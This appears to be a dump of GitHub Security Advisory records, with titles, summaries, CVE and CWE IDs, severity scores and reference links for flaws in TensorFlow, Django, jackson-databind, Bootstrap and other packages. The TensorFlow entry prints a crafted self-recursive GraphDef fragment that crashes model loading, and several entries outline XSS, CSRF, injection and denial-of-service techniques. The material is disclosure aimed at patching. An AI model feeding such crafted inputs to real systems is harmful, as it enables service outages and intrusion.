GHSA-9328-7pcw-vw69
|
Cross-Site Request Forgery in Moodle
|
Moodle before version 3.7.2 is vulnerable to information exposure of service tokens for users enrolled in the same course.
|
{'CVE-2020-1692'}
|
2022-01-06T18:34:53Z
|
2022-01-06T18:34:53Z
|
MODERATE
| 6.5
|
{'CWE-352'}
|
{'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1692', 'https://github.com/advisories/GHSA-9328-7pcw-vw69', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1692'}
| null |
GHSA
|
GHSA-247x-2f9f-5wp7
|
Stack overflow in TensorFlow
|
### Impact
The `GraphDef` format in TensorFlow does not allow self recursive functions. The runtime assumes that this invariant is satisfied. However, a `GraphDef` containing a fragment such as the following can be consumed when loading a `SavedModel`:
```
library {
function {
signature {
name: "SomeOp"
description: "Self recursive op"
}
node_def {
name: "1"
op: "SomeOp"
}
node_def {
name: "2"
op: "SomeOp"
}
}
}
```
This would result in a stack overflow during execution as resolving each `NodeDef` means resolving the function itself and its nodes.
### Patches
We have patched the issue in GitHub commit [448a16182065bd08a202d9057dd8ca541e67996c](https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
|
{'CVE-2022-23591'}
|
2022-02-11T20:00:23Z
|
2022-02-09T23:30:01Z
|
HIGH
| 7.5
|
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23591', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-247x-2f9f-5wp7', 'https://github.com/advisories/GHSA-247x-2f9f-5wp7', 'https://github.com/tensorflow/tensorflow/commit/448a16182065bd08a202d9057dd8ca541e67996c'}
| null |
GHSA
|
GHSA-2xw8-j43j-5vxp
|
elgg is vulnerable to Cross-site Scripting
|
elgg is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
|
{'CVE-2021-4072'}
|
2022-01-06T21:35:42Z
|
2022-01-06T21:35:42Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://huntr.dev/bounties/74034253-732a-4251-a0f9-eca5f576c955', 'https://github.com/advisories/GHSA-2xw8-j43j-5vxp', 'https://github.com/elgg/elgg/commit/c30b17bf75256ed3fcc84e2083147cc3951423d0', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4072'}
| null |
GHSA
|
GHSA-53x6-4x5p-rrvv
|
Denial of Service in Apache Commons Compress
|
The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.
|
{'CVE-2019-12402'}
|
2022-04-22T17:30:59Z
|
2019-10-11T18:41:08Z
|
HIGH
| 7.5
|
{'CWE-835'}
|
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r05cf37c1e1e662e968cfece1102fcd50fe207181fdbf2c30aadfafd3@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12402', 'https://lists.apache.org/thread.html/r233267e24519bacd0f9fb9f61a1287cb9f4bcb6e75d83f34f405c521@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r25422df9ad22fec56d9eeca3ab8bd6d66365e9f6bfe311b64730edf5@%3Cissues.flink.apache.org%3E', 'https://github.com/advisories/GHSA-53x6-4x5p-rrvv', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/', 'https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r7af60fbd8b2350d49d14e53a3ab2801998b9d1af2d6fcac60b060a53@%3Cdev.brooklyn.apache.org%3E', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/54cc4e9fa6b24520135f6fa4724dfb3465bc14703c7dc7e52353a0ea@%3Ccommits.creadur.apache.org%3E', 'https://lists.apache.org/thread.html/r21d64797914001119d2fc766b88c6da181dc2308d20f14e7a7f46117@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r5103b1c9242c0f812ac96e524344144402cbff9b6e078d1557bc7b1e@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r4363c994c8bca033569a98da9218cc0c62bb695c1e47a98e5084e5a0@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r590c15cebee9b8e757e2f738127a9a71e48ede647a3044c504e050a4@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r5caf4fcb69d2749225391e61db7216282955204849ba94f83afe011f@%3Cissues.flink.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/308cc15f1f1dc53e97046fddbac240e6cd16de89a2746cf257be7f5b@%3Cdev.commons.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
| null |
GHSA
|
GHSA-p2c4-gxp4-j3xp
|
Denial of service in Valine
|
Valine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.
|
{'CVE-2021-34801'}
|
2022-05-04T03:11:26Z
|
2021-06-21T17:11:25Z
|
MODERATE
| 5.3
|
{'CWE-94'}
|
{'https://github.com/xCss/Valine/issues/366', 'https://nvd.nist.gov/vuln/detail/CVE-2021-34801', 'https://github.com/advisories/GHSA-p2c4-gxp4-j3xp'}
| null |
GHSA
|
GHSA-3xc7-xg67-pw99
|
Sensitive Data Exposure in sequelize-cli
|
Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text.
## Recommendation
Upgrade to version 5.5.0 or later.
| null |
2021-08-04T20:54:46Z
|
2019-06-05T20:43:10Z
|
LOW
| 3.5
|
{'CWE-532'}
|
{'https://github.com/sequelize/cli/pull/722', 'https://github.com/advisories/GHSA-3xc7-xg67-pw99', 'https://github.com/sequelize/cli/issues/172', 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320', 'https://www.npmjs.com/advisories/825'}
| null |
GHSA
|
GHSA-9cwv-cppx-mqjm
|
Improper Authentication in Capsule Proxy
|
### Impact
Using a malicious `Connection` header, an attacker with a proper authentication mechanism could start a privilege escalation towards the Kubernetes API Server, being able to exploit the `cluster-admin` Role bound to `capsule-proxy`.
### Patches
Patch has been merged in the v0.2.1 release.
### Workarounds
Upgrading is mandatory.
|
{'CVE-2022-23652'}
|
2022-04-19T19:03:24Z
|
2022-02-23T21:17:25Z
|
HIGH
| 8.8
|
{'CWE-287'}
|
{'https://github.com/advisories/GHSA-9cwv-cppx-mqjm', 'https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8', 'https://github.com/clastix/capsule-proxy/security/advisories/GHSA-9cwv-cppx-mqjm', 'https://github.com/clastix/capsule-proxy/issues/188', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23652'}
| null |
GHSA
|
GHSA-399h-cmvp-qgx5
|
Incorrect Default Permissions in Binance tss-lib
|
The keygen protocol implementation in Binance tss-lib before 1.2.0 allows attackers to generate crafted h1 and h2 parameters in order to compromise a signing round or obtain sensitive information from other parties.
|
{'CVE-2020-12118'}
|
2021-06-29T21:32:11Z
|
2021-06-29T21:32:11Z
|
HIGH
| 7.2
|
{'CWE-276'}
|
{'https://github.com/binance-chain/tss-lib/releases/tag/v1.2.0', 'https://github.com/binance-chain/tss-lib/pull/89/commits/7b7c17e90504d5dad94b938e84fec690bb1ec311', 'https://github.com/binance-chain/tss-lib/pull/89', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12118', 'https://github.com/advisories/GHSA-399h-cmvp-qgx5'}
| null |
GHSA
|
GHSA-jpwx-ffjq-wr4w
|
Content object state fetch functions open to SQL injection
|
### Impact
This Security Update is about a vulnerability in eZ Publish Legacy. The content object state code could be vulnerable to SQL injection. There is no known exploit, but one might be possible. If you use Legacy in any way, we strongly recommend that you install this update as soon as possible.
### Patches
The fix is distributed via Composer, see "Patched versions".
| null |
2021-09-07T22:54:23Z
|
2021-09-07T22:54:23Z
|
HIGH
| 0
|
{'CWE-89'}
|
{'https://github.com/ezsystems/ezpublish-legacy/commit/f8e3a97afd92efb9148134a4bacb35a875777a42', 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-005-content-object-state-fetch-functions-open-to-sql-injection', 'https://github.com/advisories/GHSA-jpwx-ffjq-wr4w', 'https://github.com/ezsystems/ezpublish-legacy/security/advisories/GHSA-jpwx-ffjq-wr4w'}
| null |
GHSA
|
GHSA-6jmh-9gqm-5xrx
|
Cross-Site Request Forgery (CSRF) in livehelperchat
|
A CSRF issue is found in the audit configuration under settings. It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed.
|
{'CVE-2022-0226'}
|
2022-01-26T20:21:03Z
|
2022-01-26T20:21:03Z
|
MODERATE
| 4.3
|
{'CWE-352'}
|
{'https://huntr.dev/bounties/635d0abf-7680-47f6-a277-d9a91471c73f', 'https://github.com/livehelperchat/livehelperchat/commit/f59ffb02984c0ce2fbb19ac39365066507de9370', 'https://github.com/advisories/GHSA-6jmh-9gqm-5xrx', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0226'}
| null |
GHSA
|
GHSA-g8hw-794c-4j9g
|
Moderate severity vulnerability that affects org.springframework:spring-core
|
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
|
{'CVE-2018-1271'}
|
2021-10-21T21:29:40Z
|
2018-10-17T20:07:03Z
|
MODERATE
| 5.9
|
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-1271', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'http://www.securityfocus.com/bid/103699', 'https://access.redhat.com/errata/RHSA-2018:1320', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/advisories/GHSA-g8hw-794c-4j9g', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://access.redhat.com/errata/RHSA-2018:2939', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://pivotal.io/security/cve-2018-1271', 'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html'}
| null |
GHSA
|
GHSA-2m34-jcjv-45xf
|
XSS in Django
|
An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. Query parameters generated by the Django admin ForeignKeyRawIdWidget were not properly URL encoded, leading to a possibility of an XSS attack.
|
{'CVE-2020-13596'}
|
2021-08-25T21:58:12Z
|
2020-06-05T16:24:28Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4A2AP4T7RKPBCLTI2NNQG3T6MINDUUMZ/', 'https://security.netapp.com/advisory/ntap-20200611-0002/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13596', 'https://www.djangoproject.com/weblog/2020/jun/03/security-releases/', 'https://www.debian.org/security/2020/dsa-4705', 'https://usn.ubuntu.com/4381-2/', 'https://usn.ubuntu.com/4381-1/', 'https://docs.djangoproject.com/en/3.0/releases/security/', 'https://groups.google.com/forum/#!msg/django-announce/pPEmb2ot4Fo/X-SMalYSBAAJ', 'https://github.com/advisories/GHSA-2m34-jcjv-45xf'}
| null |
GHSA
|
GHSA-4f6x-49g2-99fm
|
Cross-site Scripting in Mermaid
|
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
|
{'CVE-2021-35513'}
|
2021-12-10T18:57:41Z
|
2021-12-10T18:57:41Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2', 'https://github.com/mermaid-js/mermaid/issues/2122', 'https://github.com/mermaid-js/mermaid/pull/2123', 'https://github.com/advisories/GHSA-4f6x-49g2-99fm', 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513'}
| null |
GHSA
|
GHSA-vxh3-mvv7-265j
|
Cross-site scripting invenio-records
|
## Cross-Site Scripting (XSS) vulnerability in administration interface
### Impact
A Cross-Site Scripting (XSS) vulnerability was discovered when rendering JSON for a record in the administration interface. The vulnerability could be exploited by e.g. a user who had access to upload a new record, that an admin user would then later view in the admin interface.
### Patches
All supported versions of Invenio-Records have been patched. You should upgrade to either v1.0.1, v1.1.1 or v1.2.2
### For more information
If you have any questions or comments about this advisory:
* Email us at [info@inveniosoftware.org](mailto:info@inveniosoftware.org)
|
{'CVE-2019-1020003'}
|
2021-04-12T21:46:34Z
|
2019-07-16T00:52:15Z
|
MODERATE
| 5.4
|
{'CWE-79'}
|
{'https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j', 'https://github.com/advisories/GHSA-vxh3-mvv7-265j', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020003'}
| null |
GHSA
|
GHSA-rm7f-mpcj-w4f6
|
Command injection in Apache Unomi
|
Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.
|
{'CVE-2021-31164'}
|
2021-06-16T17:17:24Z
|
2021-06-16T17:17:24Z
|
HIGH
| 7.5
|
{'CWE-74'}
|
{'http://unomi.apache.org/security/cve-2021-31164', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31164', 'https://github.com/advisories/GHSA-rm7f-mpcj-w4f6'}
| null |
GHSA
|
GHSA-jcw8-r9xm-32c6
|
Command Injection in dns-sync
|
Affected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method.
## Recommendation
- Use an alternative dns resolver
- Do not allow untrusted input into `dns-sync.resolve()`
|
{'CVE-2017-16100'}
|
2021-01-08T18:35:10Z
|
2018-07-18T18:28:02Z
|
CRITICAL
| 0
|
{'CWE-94'}
|
{'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d', 'https://github.com/skoranga/node-dns-sync/issues/1)', 'https://github.com/skoranga/node-dns-sync/issues/1', 'https://github.com/skoranga/node-dns-sync/issues/5', 'https://www.npmjs.com/advisories/523', 'https://github.com/advisories/GHSA-jcw8-r9xm-32c6', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16100', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://nodesecurity.io/advisories/523', 'https://www.npmjs.com/advisories/153'}
| null |
GHSA
|
GHSA-7g7r-gr46-q4p5
|
Cross-Site Request Forgery in yetiforce
|
Versions of yetiforce 6.3.0 and prior are subject to privilege escalation via a cross site request forgery bug. This allows an attacker to create a new admin account even with SameSite: Strict enabled. This vulnerability can be exploited by any user on the system including guest users.
|
{'CVE-2022-0269'}
|
2022-01-31T21:47:29Z
|
2022-01-27T16:21:33Z
|
HIGH
| 8
|
{'CWE-352'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0269', 'https://github.com/yetiforcecompany/yetiforcecrm/commit/298c7870e6fe4332d8aa1757a9c8d79f841389ff', 'https://github.com/advisories/GHSA-7g7r-gr46-q4p5', 'https://huntr.dev/bounties/a0470915-f6df-45b8-b3a2-01aebe764df0'}
| null |
GHSA
|
GHSA-4xf9-pgvv-xx67
|
Regular Expression Denial of Service in simple-markdown
|
Versions of `simple-markdown` prior to 0.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS). The `SimpleMarkdown.defaultInlineParse()` function has significantly degraded performance when parsing inline code blocks.
## Recommendation
Upgrade to version 0.5.2 or later.
| null |
2021-09-29T18:16:34Z
|
2020-09-03T20:27:46Z
|
MODERATE
| 5.3
|
{'CWE-400'}
|
{'https://snyk.io/vuln/SNYK-JS-SIMPLEMARKDOWN-460540', 'https://www.npmjs.com/advisories/1147', 'https://github.com/advisories/GHSA-4xf9-pgvv-xx67', 'https://github.com/Khan/simple-markdown/issues/71'}
| null |
GHSA
|
GHSA-c3cw-c387-pj65
|
Double free in crossbeam
|
An issue was discovered in the crossbeam crate before 0.4.1 for Rust. There is a double free because of destructor mishandling.
|
{'CVE-2018-20996'}
|
2021-08-25T20:43:21Z
|
2021-08-25T20:43:21Z
|
CRITICAL
| 9.8
|
{'CWE-415'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2018-20996', 'https://github.com/advisories/GHSA-c3cw-c387-pj65', 'https://github.com/crossbeam-rs/crossbeam-epoch/issues/82', 'https://rustsec.org/advisories/RUSTSEC-2018-0009.html'}
| null |
GHSA
|
GHSA-pj7m-g53m-7638
|
Moderate severity vulnerability that affects bootstrap
|
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. This is similar to CVE-2018-14042.
|
{'CVE-2018-14041'}
|
2021-06-15T16:33:24Z
|
2018-09-13T15:49:56Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html', 'https://github.com/twbs/bootstrap/issues/26423', 'http://seclists.org/fulldisclosure/2019/May/10', 'http://seclists.org/fulldisclosure/2019/May/11', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/twbs/bootstrap/pull/26630', 'https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/', 'https://github.com/twbs/bootstrap/issues/26627', 'http://seclists.org/fulldisclosure/2019/May/13', 'https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@%3Cdev.superset.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14041', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://github.com/advisories/GHSA-pj7m-g53m-7638', 'http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html', 'https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@%3Cissues.hbase.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:1456', 'https://seclists.org/bugtraq/2019/May/18'}
| null |
GHSA
|
GHSA-4r3m-j6x5-48m3
|
Cross Site Scripting(XSS) Vulnerability in Latest Release 4.3.6 Site basic settings
|
baserCMS 4.3.6 and earlier is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is toolbar.php. The issue is fixed in version 4.3.7.
|
{'CVE-2020-15155'}
|
2022-04-19T19:02:32Z
|
2020-08-28T21:20:42Z
|
LOW
| 7.3
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-4r3m-j6x5-48m3', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15155', 'https://basercms.net/security/20200827', 'https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3', 'https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f'}
| null |
GHSA
|
GHSA-p6h9-gw49-rqm4
|
Moderate severity vulnerability that affects markdown2
|
An issue was discovered in markdown2 (aka python-markdown2) through 2.3.5. The safe_mode feature, which is supposed to sanitize user input against XSS, is flawed and does not escape the input properly. With a crafted payload, XSS can be triggered, as demonstrated by omitting the final '>' character from an IMG tag.
|
{'CVE-2018-5773'}
|
2021-09-16T16:04:09Z
|
2018-07-12T20:29:21Z
|
MODERATE
| 6.1
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-p6h9-gw49-rqm4', 'https://nvd.nist.gov/vuln/detail/CVE-2018-5773', 'https://github.com/trentm/python-markdown2/issues/285'}
| null |
GHSA
|
GHSA-qxxx-2pp7-5hmx
|
A deserialization flaw was discovered in the jackson-databind
|
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.
|
{'CVE-2017-7525'}
|
2022-04-26T18:44:40Z
|
2018-10-16T17:21:35Z
|
CRITICAL
| 9.8
|
{'CWE-184', 'CWE-502'}
|
{'https://access.redhat.com/errata/RHSA-2017:2638', 'https://lists.apache.org/thread.html/r42ac3e39e6265db12d9fc6ae1cd4b5fea7aed9830dc6f6d58228fed7@%3Ccommits.cassandra.apache.org%3E', 'https://lists.apache.org/thread.html/c10a2bf0fdc3d25faf17bd191d6ec46b29a353fa9c97bebd7c4e5913@%3Cdev.lucene.apache.org%3E', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html', 'https://access.redhat.com/errata/RHSA-2017:3456', 'https://access.redhat.com/errata/RHSA-2017:2546', 'https://lists.apache.org/thread.html/4641ed8616ccc2c1fbddac2c3dc9900c96387bc226eaf0232d61909b@%3Ccommits.cassandra.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2017:1836', 'https://github.com/FasterXML/jackson-databind/issues/1599', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7525', 'https://lists.apache.org/thread.html/5008bcbd45ee65ce39e4220b6ac53d28a24d6bc67d5804e9773a7399@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html', 'https://access.redhat.com/errata/RHSA-2017:1837', 'https://access.redhat.com/errata/RHSA-2018:1450', 'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html', 'https://lists.apache.org/thread.html/c2ed4c0126b43e324cf740012a0edd371fd36096fd777be7bfe7a2a6@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/rf7f87810c38dc9abf9f93989f76008f504cbf7c1a355214640b2d04c@%3Ccommits.cassandra.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:0294', 'https://lists.apache.org/thread.html/3c87dc8bca99a2b3b4743713b33d1de05b1d6b761fdf316224e9c81f@%3Cdev.lucene.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://access.redhat.com/errata/RHSA-2017:3458', 'https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html', 'https://access.redhat.com/errata/RHSA-2017:1839', 'https://bugzilla.redhat.com/show_bug.cgi?id=1462702', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://security.netapp.com/advisory/ntap-20171214-0002/', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'https://access.redhat.com/errata/RHSA-2017:1835', 'https://github.com/advisories/GHSA-qxxx-2pp7-5hmx', 'https://lists.apache.org/thread.html/f60afd3c7e9ebaaf70fad4a4beb75cf8740ac959017a31e7006c7486@%3Cdev.lucene.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:0342', 'https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2017:3455', 'http://www.securitytracker.com/id/1039744', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/c9d5ff20929e8a3c8794facf4c4b326a9c10618812eec356caa20b87@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E', 'https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03902en_us', 'https://access.redhat.com/errata/RHSA-2017:2547', 'http://www.securitytracker.com/id/1039947', 'https://access.redhat.com/errata/RHSA-2017:3141', 'https://access.redhat.com/errata/RHSA-2017:3454', 'https://access.redhat.com/errata/RHSA-2019:2858', 'https://access.redhat.com/errata/RHSA-2017:2635', 'https://access.redhat.com/errata/RHSA-2017:2637', 'https://access.redhat.com/errata/RHSA-2017:2477', 'https://access.redhat.com/errata/RHSA-2017:2633', 'https://access.redhat.com/errata/RHSA-2019:3149', 'https://access.redhat.com/errata/RHSA-2017:2636', 'https://access.redhat.com/errata/RHSA-2017:1834', 'https://access.redhat.com/errata/RHSA-2017:1840', 'https://access.redhat.com/errata/RHSA-2018:1449', 'https://cwiki.apache.org/confluence/display/WW/S2-055', 'https://lists.apache.org/thread.html/b1f33fe5ade396bb903fdcabe9f243f7692c7dfce5418d3743c2d346@%3Cdev.lucene.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'http://www.securityfocus.com/bid/99623', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'http://www.securitytracker.com/id/1040360', 'https://access.redhat.com/errata/RHSA-2019:0910', 'https://github.com/FasterXML/jackson-databind/issues/1723', 'https://www.debian.org/security/2017/dsa-4004'}
| null |
GHSA
|
GHSA-qrmm-w4v4-q7f8
|
Unauthorized access through URL manipulation
|
### Impact
The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation.
### Patches
The vulnerability has been patched in version 1.2.65 of the `master` branch, version 1.1.113 of the 1.1.x series, and version 1.0.12 of the `stable` branch. The Docker image on docker.io has been patched.
### Workarounds
If upgrading is not possible, manually apply the changes of https://github.com/jhpyle/docassemble/commit/e3dbf6ce054b3c0310996f0657289f5eed0a73fe and restart the server (e.g., by pressing Save on the Configuration screen).
### Credit
The vulnerability was discovered by Jim Platania of Seiso LLC (@jimmio).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [docassemble](https://github.com/jhpyle/docassemble/issues)
* Join the [Slack channel](https://join.slack.com/t/docassemble/shared_invite/zt-ohrn8y9z-_Fb3RAl~JPBU6Km7odBPfQ)
* Email us at [jhpyle@gmail.com](mailto:jhpyle@gmail.com)
| null |
2022-04-19T19:02:56Z
|
2021-05-06T15:27:22Z
|
HIGH
| 0
|
{'CWE-552'}
|
{'https://github.com/advisories/GHSA-qrmm-w4v4-q7f8', 'https://github.com/jhpyle/docassemble/security/advisories/GHSA-qrmm-w4v4-q7f8'}
| null |
GHSA
|
GHSA-c92m-rrrc-q5wf
|
High severity vulnerability that affects safemode
|
The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method.
|
{'CVE-2016-3693'}
|
2021-09-08T21:49:15Z
|
2017-10-24T18:33:35Z
|
HIGH
| 8.1
|
{'CWE-200'}
|
{'http://projects.theforeman.org/issues/14635', 'http://theforeman.org/security.html#2016-3693', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3693', 'http://www.openwall.com/lists/oss-security/2016/04/20/8', 'https://github.com/svenfuchs/safemode/commit/0f764a1720a3a68fd2842e21377c8bfad6d7126f', 'https://github.com/advisories/GHSA-c92m-rrrc-q5wf', 'https://access.redhat.com/errata/RHSA-2018:0336', 'https://github.com/theforeman/foreman/commit/82f9b93c54f72c5814df6bab7fad057eab65b2f2', 'http://rubysec.com/advisories/CVE-2016-3693/'}
| null |
GHSA
|
